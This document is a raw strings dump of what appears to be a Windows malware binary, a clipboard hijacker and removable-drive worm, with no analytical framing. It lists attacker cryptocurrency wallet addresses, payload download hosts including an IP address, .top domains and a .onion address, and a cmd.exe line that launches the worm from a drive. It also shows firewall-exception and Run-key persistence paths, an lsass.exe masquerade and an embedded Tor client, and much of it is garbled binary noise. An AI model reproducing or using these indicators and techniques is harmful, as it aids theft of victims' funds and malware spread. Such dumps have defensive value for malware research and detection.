!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
buThddA
buThXjA
abcdefghijklmnopqrstuvwxyz234567
Microsoft Unified Security Protocol Provider
abcdefghijklmnopqrstuvwxyz234567
https=
socks=
%s %s %s
%s %s %s
%*s %d
WinHttpGetProxyForUrl
winhttp.dll
WinHttpGetIEProxyConfigForCurrentUser
winhttp.dll
WinHttpCloseHandle
winhttp.dll
WinHttpOpen
winhttp.dll
InternetOpenA
wininet.dll
InternetOpenUrlA
wininet.dll
InternetReadFile
wininet.dll
InternetCloseHandle
wininet.dll
InternetSetOptionA
wininet.dll
HttpQueryInfoA
wininet.dll
sscanf_s
msvcrt.dll
_snwprintf
msvcrt.dll
_snprintf
msvcrt.dll
memcmp
msvcrt.dll
memchr
msvcrt.dll
strtol
msvcrt.dll
memmove
msvcrt.dll
strncat
msvcrt.dll
_beginthreadex
msvcrt.dll
strspn
msvcrt.dll
CertOpenSystemStoreA
Crypt32.dll
CertNameToStrA
Crypt32.dll
CertFreeCertificateContext
Crypt32.dll
CryptStringToBinaryA
Crypt32.dll
CertCloseStore
Crypt32.dll
CryptDecodeObjectEx
Crypt32.dll
CryptBinaryToStringA
Crypt32.dll
StrCmpNIA
Shlwapi.dll
StrToIntA
Shlwapi.dll
StrStrIA
Shlwapi.dll
StrRStrIA
Shlwapi.dll
UrlApplySchemeA
Shlwapi.dll
UrlGetPartA
Shlwapi.dll
RtlTimeToSecondsSince1970
ntdll.dll
RtlGetVersion
ntdll.dll
RtlRandomEx
ntdll.dll
ObtainUserAgentString
urlmon.dll
InitSecurityInterfaceA
Secur32.dll
[%s]:%s
CONNECT
CONNECT
502 Bad Gateway
502 Bad Gateway
502 Bad Gateway
bitcoincash:
cosmos
bitcoincash:
15i4zgkk6g4x3eb161Ay9hMj8aZ8dswqEJpNaCY4s4C5ka17
17SBPhXtH8AxszbyEPPvFaazef6Cpup7Rg
3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ
qrzu3lahc7thkstxdsjamym2sak78j6mpy23fk3mxj
XdxqSoWqiAHKgbXP5zQabiy2kUhbtaiqmn
DAHCJcwE5y3K4nA9YGjiLWSEPmadeh7uZX
0x57af5e3E5D6CB0cA6F44D303328b4f68Edaa9E39
LKHcffQ1KFH9byXS8VdfHUYLzY9a8W4ZHg
r9Ftrva5RQP24TsK3yA5JVgDHaSSFxvt1s
TDfp7Nkqk26x6Yx7Cg4otm96HLpaUXRXfY
t1aCQnZyyAmDbuDxHvWHYJw8yHKXvGKfx2H
hxb0ccffbc162f0f385a6ee3a46bf0a8377014ff7d
QagCRREYojMZckkdU6j66KenvUndoozyCu
RATLXTEPf5kdnR2bZ5oqYVBqHP4F1EsSc4
NBYR6GLSXLPMZH3WKU5VMAH7TDVLNYUITTSBYEYW
AJE3WzUsBvX1BWF1fcnwby28114DKpoSVm
SgKyJ1YEWrnjmh2YtjNXcR4kVKqWqjYvG7
s1jsY8nEwU99RVQ3sKRmfvZyBaSdzMLPKrC
bitcoincash
bitcoincash:qrzu3lahc7thkstxdsjamym2sak78j6mpy23fk3mxj
cosmos
cosmos1d2hdcd5sdfn5afhxmglxv97duk2vuq2vuthslj
4AfbdZbgJ52fg6GbKkR2gRT3DMboW1ZToGisLqu3psxsGEtXoGg8QGhdfhcYkX5He19L2qEJpG2fajSz7mxEbYQF2zCAMKs
addr1qx2wk3tgakr5ftmva2j0jwypqdcq937ntg0ptjpu2cvglggsdyeyhxw955x8lsxew5n5v7tz0ewz34p5e8fmqm9rqv4suhfcr4
FbbtqcGFqcrWKbd67VPPi6PKJpNALJJyoy
GCY7OC7EPYI6LSMPCC54UBGNFGFMX2LJF6SCVRKS5CJD5YMHVQSGBJVW
bnb1qq5re95dlsf0l0edx8kjpurluc5uslgdgqzxnv
band192xtp5y3l0z4a4aeqywyfmdefrxxqlyuxcsngc
bc1qfqne66vggljvmreg8gz6ng8xrjtf63vrm4c40a
U24188479
E27440746
B23181897
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
http://api.wipmania.com/
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
http://7fv5nq57k4qvbrpt.onion/
f78d9du
http://185.215.113.93/
http://feedmefile.top/
http://gotsomefile.top/
http://gimmefile.top/
memmove
memcmp
memchr
strtol
??2@YAPAXI@Z
??3@YAXPAX@Z
memcpy
iswdigit
iswalpha
wcslen
wcsstr
isdigit
isalpha
strlen
_mbsstr
memset
fclose
_wfopen
strcmp
strchr
mbstowcs
wcscmp
MSVCRT.dll
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
InternetCloseHandle
InternetReadFile
InternetOpenUrlA
InternetOpenA
HttpQueryInfoA
InternetOpenUrlW
InternetOpenW
WININET.dll
URLDownloadToFileW
urlmon.dll
StrCmpNW
PathMatchSpecW
PathFileExistsW
PathFindFileNameW
PathFileExistsA
SHLWAPI.dll
freeaddrinfo
getaddrinfo
inet_ntop
WSASend
WSARecv
WSAAccept
inet_pton
WS2_32.dll
lstrlenA
HeapReAlloc
HeapAlloc
HeapFree
GetProcessHeap
EnterCriticalSection
LeaveCriticalSection
InitializeCriticalSection
DeleteCriticalSection
lstrcpynA
GetTickCount
GetSystemTimeAsFileTime
GlobalFree
GetLastError
SetLastError
SleepEx
CreateIoCompletionPort
CloseHandle
TerminateThread
WaitForSingleObject
GetProcAddress
LoadLibraryA
PostQueuedCompletionStatus
GetQueuedCompletionStatus
WaitForMultipleObjects
GlobalUnlock
GlobalLock
GlobalAlloc
lstrlenW
ExitThread
SetEndOfFile
SetFilePointer
UnmapViewOfFile
MapViewOfFile
CreateFileMappingA
GetFileSize
CreateFileW
CreateProcessW
GetLocaleInfoA
DeleteFileW
WriteFile
ExpandEnvironmentStringsW
lstrcpyW
QueryDosDeviceW
GetDriveTypeW
GetLogicalDrives
RemoveDirectoryW
FindClose
FindNextFileW
MoveFileExW
lstrcmpW
FindFirstFileW
CreateDirectoryW
lstrcmpiW
CopyFileW
SetFileAttributesW
GetVolumeInformationW
GetModuleFileNameW
GetTempPathW
CreateThread
CopyFileA
CreateMutexA
ExitProcess
DeleteFileA
MoveFileA
MoveFileW
GetModuleHandleA
GetStartupInfoA
KERNEL32.dll
CloseClipboard
SetClipboardData
EmptyClipboard
OpenClipboard
GetClipboardData
wsprintfW
wsprintfA
SetFocus
CloseWindow
SetForegroundWindow
ShowWindow
FindWindowA
USER32.dll
CryptReleaseContext
CryptAcquireContextA
CryptGenRandom
CryptEncrypt
CryptDestroyKey
CryptGetKeyParam
CryptImportKey
CryptSetKeyParam
CryptDestroyHash
CryptHashData
CryptCreateHash
CryptGetHashParam
CryptDuplicateHash
CryptExportKey
CryptVerifySignatureA
RegCloseKey
RegQueryValueExW
RegOpenKeyExW
RegCreateKeyExA
RegSetValueExA
RegOpenKeyExA
RegSetValueExW
CryptAcquireContextW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
CoCreateInstance
CoInitializeEx
ole32.dll
Microsoft Enhanced RSA and AES Cryptographic Provider
Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
GET /tor/rendezvous2/%s HTTP/1.1
Host: local
Accept-Encoding: identity
User-Agent: %s
Mozilla/5.0 (Windows NT 10.0, Win64, x64, rv:72.0) Gecko/20100101 Firefox/72.0
Negotiate
Kerberos
Proxy-Authorization: %s %s
CONNECT %s:%s HTTP/1.0
Host: %s:%s
Pragma: no-cache
Content-Length: 0
Proxy-Connection: Keep-Alive%s
CONNECT %s:%s HTTP/1.1
Pragma: no-cache
Proxy-Connection: Keep-Alive%s
deflate
%s%s%sConnection: close
Accept-Encoding: gzip
Proxy-Connection: close
http%s://%s
https://
Proxy-
Proxy-Authenticate:
Negotiate
Kerberos
Content-Length:
Transfer-Encoding:
chunked
.onion
HTTP/1.0 200 OK
HTTP/1.0 404 Not Found
HTTP/1.0 403 Forbidden
HTTP/1.0 502 Bad Gateway
HTTP/1.0 504 Gateway Timeout
HTTP/1.0 500 Internal Server Error
HTTP/1.0 %s
http://%s:%hu/tor/server/fp/%s.z
router %s %s
-----END RSA PUBLIC KEY-----
onion-key
http://%s:%hu/tor/status-vote/current/consensus.z
directory-footer
circwindow=
HSDir
%*s %s %s %*s %*s %*s %s %s %hu
Valid
Stable
Running
Guard
StaleDesc
BadExit
accept 1-65535
http://%s
HTTP/1.0 200 OK
Host: 127.0.0.1
Content-Type: application/octet-stream
Content-Encoding: deflate
Pragma: no-cache
Proxy-Connection: close
Connection: close
Content-Length: %lu
502 Bad Gateway
400 Bad Request
413 Request Entity Too Large
127.0.0.1:%hu
http://127.0.0.1:%hu
msvcrt.dll
sscanf_s
_beginthreadex
Secur32.dll
InitSecurityInterfaceA
200 Connection Established
secret-id-part
protocol-versions
introduction-points
-----BEGIN MESSAGE-----
-----END MESSAGE-----
introduction-point
ip-address
onion-port
onion-key
-----END RSA PUBLIC KEY-----
service-key
http://%s
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
http://www.w4tw4tw4tw4t4.jo/
f5d4s54s4sds5d5d5d
3r3hr8h38h8h38f8hff
w4tw84thw4h8th8w4h8t
3rvr3r3bru3urbu3rbub
38fh83hf83hf83hf38h
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
61I1\1q1{1
2%272>2U2_2f2l2w2~2
3A4H4k4
: :::M:i:
<!<G<{<
<D<k<y<
='=1=s=x=~=
?>?H?l?v?
8r9 :J:
:i<b=o=
?!?B?_?
P1\2a3
5(585I5
7z:S<Y<
2 333F3Y3q3
4G4W4c4~4
5/5<5b5
556N6,797H7P7m7u7
8%8;8Q8d8z8
8.9:9X:e:v:
:-;I;c;n;x;
; <5<R<_<x<
>%?=?{?
4A6j6}6
7Q<g<}<
2(2>2T2g2}2
5?6X6s6
6*7B7Z7
>B>G>M>n>u>
?/?C?X?j?p?
0C0Z0h0p0
1$1)1.1;1@1E1R1W1\1i1n1s1
2!2&2+282=2B2O2T2Y2f2k2p2}2
3#3(353:3?3L3Q3V3c3h3m3z3
+0<2R2*3
4I5O6^6j6
1Y2i2x2
;-;@;S;f;y;
;7<W<w<
98:P:k:!=
:3:[:r:
;4;>;Y;e;o;
< <2<N<W<]<p<y<
>(?1?:?D?o?x?
2u243=3O3a3s3
4'494K4]4b4y4~4
5*5/5F5X5j5|5
8?9H9Z9l9~9
: :2:D:V:h:m:
;5;:;Q;c;u;
;Z<f<y<
>->F>g>
Y0i0x0
1/252K2U2r2
3(3Q3z3
364C4S4Y4
515@5K5W5d5t5
5+6_6l6
788F8i8s8
::,:h:|:
;$;1;D;Q;];j;z;
<#<)<8<E<X<w<
='=1=;=E=b=o=x=
=;>Q>^>s>
>4?H?]?
0^0|0
5 5&51565<5A5F5L5W5\5b5o5t5z5
6"6(6-62686C6H6N6Y6^6d6q6~6
77%707=7H7W7\7b7o7t7z7
8 8&898?8W8\8b8m8r8w8}8
9%929=9O9T9Z9i9n9t9
:$:,:1:6:<:A:G:L:Q:W:\:b:m:z:
;,;2;;;A;L;Q;W;b;g;l;r;y;
<F<K<Q<\<a<f<l<s<y<
=!=&=,=7=i=n=s=y=
>.>@>J>T>^>h>r>|>
?0?C?S?^?j?v?
0$000<0G0T0a0l0x0
1-1l1r1
2'2,22292>2D2I2N2T2Y2_2d2i2o2z2
3 3%3+363;3@3F3S3Y3d3j3q3v3|3
4#4(4-434:4@4V4[4a4f4k4q4~4
5!545:5T5a5n5
66*676=6Y6f6z6
7 7&7c7h7n7
8*8/8Q8~8
9 9%9+90969;9@9F9K9Q9X9^9r9w9}9
:!:5:;:F:K:Q:^:i:v:
;&;+;1;6;;;A;N;T;p;};
<$<1<7<S<`<z<
=X=]=c=h=n=s=x=~=
>#>.>3>9>>>C>I>{>
??*?0?B?G?M?X?]?c?n?s?y?
00$0*050:0@0M0R0X0_0d0j0o0t0z0
1<1A1F1L1Y1f1|1
2"212>2C2I2T2a2g2
3!3J3P3d3j3o3t3z3
4)4.44494?4L4Q4V4\4k4p4u4{4
5+515]5b5h5m5s5
5+61666;6A6b6
7"757K7^7q7~7
88V8c8v8
:::G:T:_:
;;;\;};
=7=X=y=
V1\1b1
2 2&20252Y2`2g2n2t2|2
203T3d3
6 6$6(6,6064686<6D6H6
bitcoincash:
cosmos
bitcoincash:
15i4zgkk6g4x3eb161Ay9hMj8aZ8dswqEJpNaCY4s4C5ka17
17SBPhXtH8AxszbyEPPvFaazef6Cpup7Rg
3AcMV5pSUcxMmmcMbfSkJXRKbCrF3ysUDJ
qrzu3lahc7thkstxdsjamym2sak78j6mpy23fk3mxj
XdxqSoWqiAHKgbXP5zQabiy2kUhbtaiqmn
DAHCJcwE5y3K4nA9YGjiLWSEPmadeh7uZX
0x57af5e3E5D6CB0cA6F44D303328b4f68Edaa9E39
LKHcffQ1KFH9byXS8VdfHUYLzY9a8W4ZHg
r9Ftrva5RQP24TsK3yA5JVgDHaSSFxvt1s
TDfp7Nkqk26x6Yx7Cg4otm96HLpaUXRXfY
t1aCQnZyyAmDbuDxHvWHYJw8yHKXvGKfx2H
hxb0ccffbc162f0f385a6ee3a46bf0a8377014ff7d
QagCRREYojMZckkdU6j66KenvUndoozyCu
RATLXTEPf5kdnR2bZ5oqYVBqHP4F1EsSc4
NBYR6GLSXLPMZH3WKU5VMAH7TDVLNYUITTSBYEYW
AJE3WzUsBvX1BWF1fcnwby28114DKpoSVm
SgKyJ1YEWrnjmh2YtjNXcR4kVKqWqjYvG7
s1jsY8nEwU99RVQ3sKRmfvZyBaSdzMLPKrC
bitcoincash
bitcoincash:qrzu3lahc7thkstxdsjamym2sak78j6mpy23fk3mxj
cosmos
cosmos1d2hdcd5sdfn5afhxmglxv97duk2vuq2vuthslj
4AfbdZbgJ52fg6GbKkR2gRT3DMboW1ZToGisLqu3psxsGEtXoGg8QGhdfhcYkX5He19L2qEJpG2fajSz7mxEbYQF2zCAMKs
addr1qx2wk3tgakr5ftmva2j0jwypqdcq937ntg0ptjpu2cvglggsdyeyhxw955x8lsxew5n5v7tz0ewz34p5e8fmqm9rqv4suhfcr4
FbbtqcGFqcrWKbd67VPPi6PKJpNALJJyoy
GCY7OC7EPYI6LSMPCC54UBGNFGFMX2LJF6SCVRKS5CJD5YMHVQSGBJVW
bnb1qq5re95dlsf0l0edx8kjpurluc5uslgdgqzxnv
band192xtp5y3l0z4a4aeqywyfmdefrxxqlyuxcsngc
bc1qfqne66vggljvmreg8gz6ng8xrjtf63vrm4c40a
U24188479
E27440746
B23181897
%temp%
%ls\%d%d.exe
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
%ls:Zone.Identifier
%ls\%d%d.exe
%ls:Zone.Identifier
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDrives
%windir%\system32\cmd.exe
/c start __ & __\DriveMgr.exe & exit
%s.lnk
%s\%s\DriveMgr.exe
shell32.dll
shell32.dll
%s\%s\%s
%ls\%d%d.exe
ulsass.exe
Host Process for Windows Services
%systemdrive%
%userprofile%
%temp%
%ls:Zone.Identifier
lsass.exe
%ls\%d%d%d
%ls\%ls
%ls:*:Enabled:%ls
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
.onion
he5u5eue5ue5ue5ue5u
w4yw4t4tw4twyw4y
w4tw4yw4yw4tw4t
w4twywyw4yw4yw4yw4y
rsgrs7s7frfg7rsfg7r
ehe5hkoejjgij5ijgij5eg
4ey44it94j9jwh94hg9wjfwjf
w3f8w84hg8w48fwh8fh8wh8f4wy
83f3bf3vfv3bbc388f3b3f
3r3g72g7g27g7g73gr73g7g3
w5hw5hw5hw5hwf4fw4fw45gw5g
gnegieb5igbei5bgie5ibg5g
f3f37f3h7h3h7d37d7h73gf3f
f4f47gf74gf74gf74fg4
f4f47fg74gf7g47gf7g4f
egege7eg7g7g575h7eg7h7g